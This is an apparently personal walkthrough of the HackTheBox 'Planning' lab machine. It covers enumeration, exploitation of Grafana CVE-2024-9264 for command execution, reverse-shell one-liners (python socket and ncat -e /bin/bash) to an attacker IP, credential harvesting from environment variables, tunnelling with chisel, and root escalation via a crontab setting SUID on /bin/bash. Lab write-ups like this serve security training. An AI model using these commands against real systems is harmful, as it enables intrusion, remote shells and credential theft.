Here is my note on PLANNING box from Hackthebox.
PLANNING: 10.129.88.117
As is common in real life pentests, you will start the Planning box with credentials for the following account: admin / 0D5oT70Fq13EvB5r
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 9.6p1 Ubuntu 3ubuntu13.11 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 256 62fff6d4578805adf4d3de5b9bf850f1 (ECDSA)
|_ 256 4cce7d5cfb2da09e9fbdf55c5e61508a (ED25519)
80/tcp open http nginx 1.24.0 (Ubuntu)
|_http-server-header: nginx/1.24.0 (Ubuntu)
|_http-title: Did not follow redirect to http://planning.htb/
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
- Nikto v2.5.0
---------------------------------------------------------------------------
+ Target IP: 10.129.88.117
+ Target Hostname: 10.129.88.117
+ Target Port: 80
+ Start Time: 2025-05-27 14:19:42 (GMT-4)
---------------------------------------------------------------------------
+ Server: nginx/1.24.0 (Ubuntu)
+ /: The anti-clickjacking X-Frame-Options header is not present. See: https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/X-Frame-Options
+ /: The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type. See: https://www.netsparker.com/web-vulnerability-scanner/vulnerabilities/missing-content-type-header/
+ Root page / redirects to: http://planning.htb/
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ 8102 requests: 0 error(s) and 2 item(s) reported on remote host
+ End Time: 2025-05-27 14:24:50 (GMT-4) (308 seconds)
---------------------------------------------------------------------------
https://github.com/themewagon/Edukate/ - Original Source of planning.htb
VHOST Enumeration:
ffuf -w /usr/share/seclists/Discovery/DNS/bitquark-subdomains-top100000.txt -u http://planning.htb/ -H "Host: FUZZ.planning.htb"
ffuf -w /usr/share/seclists/Discovery/DNS/bitquark-subdomains-top100000.txt -u http://planning.htb/ -H "Host: FUZZ.planning.htb" --fs 178
grafana [Status: 302, Size: 29, Words: 2, Lines: 3, Duration: 40ms]
grafana.planning.htb:
Grafana v11.0.0
admin:0D5oT70Fq13EvB5r - WORKS !
https://github.com/nollium/CVE-2024-9264
┌──(root㉿kali)-[/home/kali/BOXES/PLANNING/CVE-2024-9264]
└─# python3 CVE-2024-9264.py http://grafana.planning.htb -u admin -p 0D5oT70Fq13EvB5r -c whoami
[+] Logged in as admin:0D5oT70Fq13EvB5r
[+] Executing command: whoami
[+] Successfully ran duckdb query:
[+] SELECT 1;install shellfs from community;LOAD shellfs;SELECT * FROM read_csv('whoami >/tmp/grafana_cmd_output 2>&1 |'):
[+] Successfully ran duckdb query:
[+] SELECT content FROM read_blob('/tmp/grafana_cmd_output'):
root
┌──(root㉿kali)-[/home/kali/BOXES/PLANNING/CVE-2024-9264]
└─# python3 CVE-2024-9264.py http://grafana.planning.htb -u admin -p 0D5oT70Fq13EvB5r -c id
[+] Logged in as admin:0D5oT70Fq13EvB5r
[+] Executing command: id
[+] Successfully ran duckdb query:
[+] SELECT 1;install shellfs from community;LOAD shellfs;SELECT * FROM read_csv('id >/tmp/grafana_cmd_output 2>&1 |'):
[+] Successfully ran duckdb query:
[+] SELECT content FROM read_blob('/tmp/grafana_cmd_output'):
uid=0(root) gid=0(root) groups=0(root)
┌──(root㉿kali)-[/home/kali/BOXES/PLANNING/CVE-2024-9264]
└─# python3 CVE-2024-9264.py http://grafana.planning.htb -u admin -p 0D5oT70Fq13EvB5r -c hostname
[+] Logged in as admin:0D5oT70Fq13EvB5r
[+] Executing command: hostname
[+] Successfully ran duckdb query:
[+] SELECT 1;install shellfs from community;LOAD shellfs;SELECT * FROM read_csv('hostname >/tmp/grafana_cmd_output 2>&1 |'):
[+] Successfully ran duckdb query:
[+] SELECT content FROM read_blob('/tmp/grafana_cmd_output'):
7ce659d667d7
RCE ACHIEVED !
python3 -c 'import socket,os,pty;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.14.160",1234));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);pty.spawn("/bin/bash")'"
┌──(root㉿kali)-[/home/kali/BOXES/PLANNING/CVE-2024-9264]
└─# python3 CVE-2024-9264.py http://grafana.planning.htb -u admin -p 0D5oT70Fq13EvB5r -c '/tmp/ncat -nv 10.10.14.160 1234 -e /bin/bash'
[+] Logged in as admin:0D5oT70Fq13EvB5r
[+] Executing command: /tmp/ncat -nv 10.10.14.160 1234 -e /bin/bash
┌──(root㉿kali)-[/home/kali/BOXES/PLANNING]
└─# sudo rlwrap nc -lnvp 1234
listening on [any] 1234 ...
connect to [10.10.14.160] from (UNKNOWN) [10.129.88.117] 51162
id
uid=0(root) gid=0(root) groups=0(root)
whoami
root
hostname
7ce659d667d7
WORKS but in DOCKER-ENV !
python3 -c 'import pty; pty.spawn("/bin/bash")'
ls
LICENSE
bin
conf
public
pwd
/usr/share/grafana
uid=0(root) gid=0(root) groups=0(root)
cd /var/lib
ls
apt
dpkg
grafana
misc
pam
shells.state
systemd
cd grafana
ls
csv
grafana.db
pdf
plugins
png
pwd
/var/lib/grafana
exit
meterpreter > download /var/lib/grafana/grafana.db
[*] Downloading: /var/lib/grafana/grafana.db -> /home/kali/BOXES/PUPPY/grafana.db
[*] Downloaded 980.00 KiB of 980.00 KiB (100.0%): /var/lib/grafana/grafana.db -> /home/kali/BOXES/PUPPY/grafana.db
[*] Completed : /var/lib/grafana/grafana.db -> /home/kali/BOXES/PUPPY/grafana.db
Download it in Meterperter payload as usual.
env
NCAT_LOCAL_ADDR=172.17.0.2
AWS_AUTH_SESSION_DURATION=15m
HOSTNAME=7ce659d667d7
PWD=/tmp
AWS_AUTH_AssumeRoleEnabled=true
GF_PATHS_HOME=/usr/share/grafana
AWS_CW_LIST_METRICS_PAGE_LIMIT=500
HOME=/usr/share/grafana
NCAT_LOCAL_PORT=48514
NCAT_REMOTE_PORT=1234
AWS_AUTH_EXTERNAL_ID=
SHLVL=1
GF_PATHS_PROVISIONING=/etc/grafana/provisioning
NCAT_PROTO=TCP
GF_SECURITY_ADMIN_PASSWORD=RioTecRANDEntANT!
GF_SECURITY_ADMIN_USER=enzo
GF_PATHS_DATA=/var/lib/grafana
Found enzo credential.
enzo:RioTecRANDEntANT!
ssh enzo@10.129.88.117
enzo@planning:~$ whoami
enzo
enzo@planning:~$ hostname
planning
ENZO SHELL !
enzo@planning:~$ whoami
enzo
enzo@planning:~$ hostname
planning
enzo@planning:~$ cat user.txt
[REDIRECTED]
USER.TXT: [REDIRECTED]
PRIV ESC:
enzo@planning:~$ sudo -l
[sudo] password for enzo:
Sorry, user enzo may not run sudo on planning.
enzo@planning:~$ id
uid=1000(enzo) gid=1000(enzo) groups=1000(enzo)
no sudo -l
no gcc
no kernel exploit.
no SUID3NUM.
no crontab
no pspy
netstat -tulpn:
[SNIP]
tcp 0 0 127.0.0.1:8000 0.0.0.0:* LISTEN -
chisel server -p 53 --reverse
./chisel client 10.10.14.160:53 R:8000:127.0.0.1:8000
enzo@planning:/opt$ cd crontabs
enzo@planning:/opt/crontabs$ ls
crontab.db
enzo@planning:/opt/crontabs$ ls -lah
total 12K
drwxr-xr-x 2 root root 4.0K May 27 18:09 .
drwxr-xr-x 4 root root 4.0K Feb 28 19:21 ..
-rw-r--r-- 1 root root 737 May 27 20:27 crontab.db
enzo@planning:/opt/crontabs$ cat crontab.db
{"name":"Grafana backup","command":"/usr/bin/docker save root_grafana -o /var/backups/grafana.tar && /usr/bin/gzip /var/backups/grafana.tar && zip -P P4ssw0rdS0pRi0T3c /var/backups/grafana.tar.gz.zip /var/backups/grafana.tar.gz && rm /var/backups/grafana.tar.gz","schedule":"@daily","stopped":false,"timestamp"
:"Fri Feb 28 2025 20:36:23 GMT+0000 (Coordinated Universal Time)","logging":"false","mailing":{},"created":1740774983276,"saved":false,"_id":"GTI22PpoJNtRK
g0W"}
{"name":"Cleanup","command":"/root/scripts/cleanup.sh","schedule":"* * * * *","stopped":false,"timestamp":"Sat Mar 01 2025 17:15:09 GMT+0000 (Coordinated U
niversal Time)","logging":"false","mailing":{},"created":1740849309992,"saved":false,"_id":"gNIRXh1WIc9K7BYX"}
root:P4ssw0rdS0pRi0T3c for 127.0.0.1:8000
127.0.0.1:8000 = crontab as root
We can edit as chmod u+s /bin/bash as usual.
enzo@planning:/opt/crontabs$ ls -lah /bin/bash
-rwsr-xr-x 1 root root 1.4M Mar 31 2024 /bin/bash
enzo@planning:/opt/crontabs$ /bin/bash -p
bash-5.2# whoami
root
bash-5.2# id
uid=1000(enzo) gid=1000(enzo) euid=0(root) groups=1000(enzo)
bash-5.2# hostname
planning
ROOT-SHELL !
https://mux1337.gitbook.io/write-up-_/hack-the-box/machines/planning
bash-5.2# whoami
root
bash-5.2# hostname
planning
bash-5.2# pwd
/root
bash-5.2# ls
root.txt scripts
bash-5.2# cat root.txt
[REDIRECTED]
ROOT.TXT: [REDIRECTED]